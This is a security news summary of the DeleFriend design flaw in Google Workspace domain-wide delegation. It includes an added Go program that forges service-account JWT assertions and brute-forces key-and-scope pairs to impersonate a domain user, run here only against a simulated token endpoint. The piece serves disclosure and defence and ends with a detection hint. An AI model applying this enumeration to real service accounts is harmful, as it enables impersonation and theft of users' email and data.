Google Workspace's Design Flaw Exposes Organizations to Unauthorized Access

Researchers at security company Hunters have disclosed what they describe as a "severe design flaw" in Google Workspace's domain-wide delegation feature, the mechanism that lets a Google Cloud Platform (GCP) service account act on behalf of users in a Workspace domain. The flaw, codenamed DeleFriend, lets an attacker who already holds sufficient access to the GCP project hosting such service accounts abuse existing delegations without needing Workspace super admin privileges. Rather than needing to know which private key and which OAuth scopes a delegation was set up with, the attacker mints large numbers of JSON Web Token assertions, trying each service account private key against each candidate scope until Google's token endpoint accepts a combination; the resulting access token then allows API calls on behalf of other identities in the domain. Successful exploitation could result in theft of emails, data exfiltration, and unauthorized actions through Google Workspace APIs.
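As an added example, not code from the article, from Hunters or from Google, the Go program below shows the shape of the search the summary describes: a service-account JWT assertion (iss = service account, sub = the impersonated Workspace user, scope, aud = Google's token endpoint) is built and RS256-signed, then every private key the attacker holds is tried against every candidate scope, keeping only the pairs the endpoint accepts. The token endpoint is a constructed stand-in (`FakeTokenEndpoint`) that knows which public keys are registered on the service account and which scopes the domain delegated; the audience and scope URLs are real Google values used only as claim strings, the service account and victim addresses are made up, and nothing is sent to Google.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
	"time"
)

// Real Google values, used here only as claim strings; nothing in this file contacts Google.
const tokenAudience = "https://oauth2.googleapis.com/token"
const scopePrefix = "https://www.googleapis.com/auth/"

var b64 = base64.RawURLEncoding

// Claims of a domain-wide-delegation assertion: iss is the service account, sub the impersonated user.
type Claims struct {
	Iss   string `json:"iss"`
	Sub   string `json:"sub"`
	Scope string `json:"scope"`
	Aud   string `json:"aud"`
	Exp   int64  `json:"exp"`
}

// BuildAssertion signs the claims as an RS256 JWT, the form Google's token endpoint consumes.
func BuildAssertion(key *rsa.PrivateKey, c Claims) string {
	hdr, _ := json.Marshal(map[string]string{"alg": "RS256", "typ": "JWT"})
	body, _ := json.Marshal(c) // only strings and an int, so Marshal cannot fail
	input := b64.EncodeToString(hdr) + "." + b64.EncodeToString(body)
	digest := sha256.Sum256([]byte(input))
	sig, err := rsa.SignPKCS1v15(rand.Reader, key, crypto.SHA256, digest[:])
	if err != nil {
		panic(err) // only an invalid key or a failed entropy read gets here
	}
	return input + "." + b64.EncodeToString(sig)
}

// FakeTokenEndpoint is a constructed stand-in for Google's endpoint: the registered public keys and delegated scopes of one service account.
type FakeTokenEndpoint struct {
	RegisteredKeys  []*rsa.PublicKey
	DelegatedScopes map[string]bool
}

// Exchange accepts only if a registered key signed the assertion and every requested scope is delegated.
func (e *FakeTokenEndpoint) Exchange(assertion string) error {
	parts := strings.Split(assertion, ".")
	if len(parts) != 3 {
		return fmt.Errorf("invalid_grant")
	}
	payload, err1 := b64.DecodeString(parts[1])
	sig, err2 := b64.DecodeString(parts[2])
	digest := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	verified := false
	for _, pub := range e.RegisteredKeys {
		verified = verified || rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig) == nil
	}
	var c Claims
	if err1 != nil || err2 != nil || !verified || json.Unmarshal(payload, &c) != nil || c.Aud != tokenAudience {
		return fmt.Errorf("invalid_grant")
	}
	for _, s := range strings.Fields(c.Scope) {
		if !e.DelegatedScopes[s] {
			return fmt.Errorf("unauthorized_client")
		}
	}
	return nil
}

// Enumerate is the DeleFriend-style search: every key tried against every candidate scope for one victim; only accept/reject is observed. Returns accepted scopes per key index.
func Enumerate(keys []*rsa.PrivateKey, saEmail, victim string, scopes []string, exchange func(string) error) map[int][]string {
	hits := map[int][]string{}
	for i, k := range keys {
		for _, sc := range scopes {
			c := Claims{Iss: saEmail, Sub: victim, Scope: sc, Aud: tokenAudience, Exp: time.Now().Unix() + 3600}
			if exchange(BuildAssertion(k, c)) == nil {
				hits[i] = append(hits[i], sc)
			}
		}
	}
	return hits
}

// Demo uses constructed data: two keys, only the second registered on the service account, one delegated scope among three candidates, so exactly one pair is accepted.
func Demo() (map[int][]string, error) {
	k0, err0 := rsa.GenerateKey(rand.Reader, 2048)
	k1, err1 := rsa.GenerateKey(rand.Reader, 2048)
	if err0 != nil || err1 != nil {
		return nil, fmt.Errorf("key generation failed")
	}
	ep := &FakeTokenEndpoint{RegisteredKeys: []*rsa.PublicKey{&k1.PublicKey}, DelegatedScopes: map[string]bool{scopePrefix + "gmail.readonly": true}}
	scopes := []string{scopePrefix + "gmail.readonly", scopePrefix + "drive.readonly", scopePrefix + "admin.directory.user.readonly"}
	return Enumerate([]*rsa.PrivateKey{k0, k1}, "sa@example-project.iam.gserviceaccount.com", "victim@example.com", scopes, ep.Exchange), nil
}

func main() { fmt.Println(Demo()) } // expect map[1:[https://www.googleapis.com/auth/gmail.readonly]] <nil>
```

The point of the stand-in endpoint is that it answers only accept or reject, exactly what a real token endpoint gives an attacker, which is why the search is cheap: the number of attempts is keys times candidate scopes, and nothing about the domain's delegation configuration has to be known in advance. The same property is what defenders can lean on: a burst of assertion exchanges from one service account cycling through scopes and freshly created keys is the observable side of this search.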
- Design Flaw in Google Workspace Could Let Attackers Gain Unauthorized Access (The Hacker News)
- Design flaw leaves Google Workspace vulnerable for takeover (Help Net Security)
- Researchers Claim Design Flaw in Google Workspace Puts Organizations at Risk (DARKReading)
- Design Flaw in Domain-Wide Delegation Could Leave Google Workspace Vulnerable for Takeover, Says Cybersecurity Company Hunters (Analytics Insight)